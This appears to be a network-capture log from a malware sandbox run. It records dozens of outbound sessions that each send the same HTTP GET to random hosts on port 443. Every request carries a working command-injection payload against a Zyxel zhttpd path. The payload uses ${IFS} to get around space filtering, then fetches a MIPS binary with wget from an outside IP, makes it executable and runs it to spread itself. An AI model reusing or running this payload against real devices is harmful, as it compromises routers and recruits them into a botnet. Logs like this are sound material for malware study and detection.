                                                        Jan 28, 2024 10:12:52.405103922 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4448192.168.2.1457144213.102.127.31443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405148029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4449192.168.2.144731467.141.188.201443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405199051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4450192.168.2.144813696.214.54.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405230045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4451192.168.2.1446706173.156.145.59443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405270100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4452192.168.2.145266857.112.209.119443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405297041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4453192.168.2.145618418.57.159.18443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405350924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4454192.168.2.1443874192.128.125.213443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405384064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4455192.168.2.143334451.170.138.245443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405426979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4456192.168.2.144446071.222.3.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405458927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4457192.168.2.144811034.72.218.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405494928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4458192.168.2.144850495.200.205.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405525923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4459192.168.2.1452550137.130.78.230443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405555010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4460192.168.2.143961863.21.216.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405610085 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4461192.168.2.1453278211.230.44.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405648947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4462192.168.2.1448156151.209.148.7443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405673027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4463192.168.2.1447416166.209.64.140443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.405720949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4464192.168.2.1448548162.153.50.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:52.409266949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4465192.168.2.1458318220.232.13.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.417804956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4466192.168.2.145525882.94.89.228443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.417835951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4467192.168.2.145377085.197.1.14443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.417880058 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4468192.168.2.1459712121.169.188.51443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.417984009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4469192.168.2.143515236.71.3.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418021917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4470192.168.2.144848438.159.215.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418085098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4471192.168.2.1441786170.220.95.222443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418114901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4472192.168.2.1446102218.57.65.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418171883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4473192.168.2.1443192185.236.253.79443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418212891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4474192.168.2.1446394187.238.49.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418261051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4475192.168.2.144397819.100.40.97443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418297052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4476192.168.2.144507083.250.62.11443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418345928 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4477192.168.2.1437254105.201.71.9443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418373108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4478192.168.2.144476874.81.223.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418454885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4479192.168.2.1445178213.243.96.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418478012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4480192.168.2.1444244102.40.231.10443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418478012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4481192.168.2.145254684.61.56.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418488979 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4482192.168.2.1447082139.46.235.38443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418540001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4483192.168.2.144006268.41.211.223443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418591976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4484192.168.2.144594863.166.214.101443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418636084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4485192.168.2.1446372203.36.45.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418679953 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4486192.168.2.1459112186.135.157.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418730974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4487192.168.2.1451192155.155.137.113443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418771029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4488192.168.2.146020637.125.231.165443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418803930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4489192.168.2.143420846.70.234.188443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418831110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4490192.168.2.143665247.177.210.164443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418868065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4491192.168.2.144872072.3.177.89443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418909073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4492192.168.2.1443222104.70.211.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418951988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4493192.168.2.1442614149.146.200.15443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.418982983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4494192.168.2.144261876.201.114.25443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419020891 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4495192.168.2.1432880219.99.201.16443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419075966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4496192.168.2.14493682.9.219.115443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419116974 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4497192.168.2.145699840.119.149.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419157028 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4498192.168.2.145425669.58.188.126443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419189930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4499192.168.2.1456054158.9.171.211443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419234037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4500192.168.2.1434170179.47.115.186443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419282913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4501192.168.2.1460358177.8.199.17443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419308901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4502192.168.2.1454344133.33.105.82443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419354916 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4503192.168.2.143776440.238.72.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419401884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4504192.168.2.1438676116.239.179.114443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419431925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4505192.168.2.1445688217.165.249.50443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419481039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4506192.168.2.1444246213.145.133.234443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419518948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4507192.168.2.1446024210.185.119.200443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:12:53.419563055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        4508192.168.2.1432842156.247.255.119443
                                                        TimestampBytes transferredDirectionData
